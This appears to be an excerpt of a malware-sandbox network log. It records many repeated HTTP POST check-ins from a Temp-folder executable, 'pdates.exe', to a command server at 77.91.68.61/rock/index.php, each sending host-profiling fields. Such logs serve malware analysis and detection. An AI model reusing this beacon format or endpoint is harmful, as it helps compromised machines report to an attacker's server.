Jul 27, 2023 01:35:42.001266956 CEST	5753	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:42.051374912 CEST	5754	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:42 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
607	192.168.2.5	50329	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:42.225192070 CEST	5754	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:42.275078058 CEST	5754	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:42 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
608	192.168.2.5	50330	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:42.435326099 CEST	5755	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:42.484359980 CEST	5755	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:42 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
609	192.168.2.5	50331	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:42.969826937 CEST	5756	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:43.017853022 CEST	5756	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:42 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
61	192.168.2.5	49778	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:19.851775885 CEST	2906	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:19.900024891 CEST	2906	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:19 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
610	192.168.2.5	50332	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:43.188277960 CEST	5757	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:43.236993074 CEST	5757	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:43 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
611	192.168.2.5	50333	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:43.481030941 CEST	5758	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:43.529814959 CEST	5758	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:43 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
612	192.168.2.5	50334	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:43.718936920 CEST	5759	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:43.768275976 CEST	5759	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:43 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
613	192.168.2.5	50335	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:44.550645113 CEST	5760	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:44.600317001 CEST	5760	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:44 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
614	192.168.2.5	50336	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:44.769366980 CEST	5761	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:44.818242073 CEST	5761	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:44 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
615	192.168.2.5	50337	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:46.353512049 CEST	5762	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:46.475702047 CEST	5762	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:46 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
616	192.168.2.5	50338	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:46.701903105 CEST	5763	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:46.753120899 CEST	5763	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:46 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
617	192.168.2.5	50339	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:46.935966969 CEST	5764	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:46.987174988 CEST	5764	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:46 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
618	192.168.2.5	50340	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:47.167211056 CEST	5765	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:47.217463017 CEST	5765	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:47 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
619	192.168.2.5	50341	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:47.395041943 CEST	5766	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:47.481961012 CEST	5766	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:47 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
62	192.168.2.5	49779	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:33:20.297333956 CEST	2907	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:33:20.345674038 CEST	2907	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:33:20 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
620	192.168.2.5	50342	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:47.651252031 CEST	5767	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:47.702788115 CEST	5767	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:47 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
621	192.168.2.5	50343	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:47.878290892 CEST	5768	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:47.928998947 CEST	5768	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:47 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
622	192.168.2.5	50344	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:48.128140926 CEST	5769	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:48.177835941 CEST	5769	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:48 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
623	192.168.2.5	50345	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:48.335519075 CEST	5769	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:48.385715961 CEST	5770	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:48 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
624	192.168.2.5	50346	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:48.543417931 CEST	5770	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:48.592477083 CEST	5771	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:48 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
625	192.168.2.5	50347	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:48.756316900 CEST	5771	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:48.806799889 CEST	5772	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:48 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
626	192.168.2.5	50348	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
Jul 27, 2023 01:35:48.963702917 CEST	5772	OUT	POST /rock/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 77.91.68.61 Content-Length: 88 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 38 36 26 73 64 3d 38 38 63 38 62 62 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 32 38 37 34 30 30 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.86&sd=88c8bb&os=1&bi=1&ar=0&pc=287400&un=user&dm=&av=13&lv=0&og=0
Jul 27, 2023 01:35:49.012202978 CEST	5773	IN	HTTP/1.1 200 OK Date: Wed, 26 Jul 2023 23:35:48 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 6 Content-Type: text/html; charset=UTF-8 Data Raw: 3c 63 3e 3c 64 3e Data Ascii: <c><d>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
627	192.168.2.5	50349	77.91.68.61	80	C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Timestamp	kBytes transferred	Direction	Data
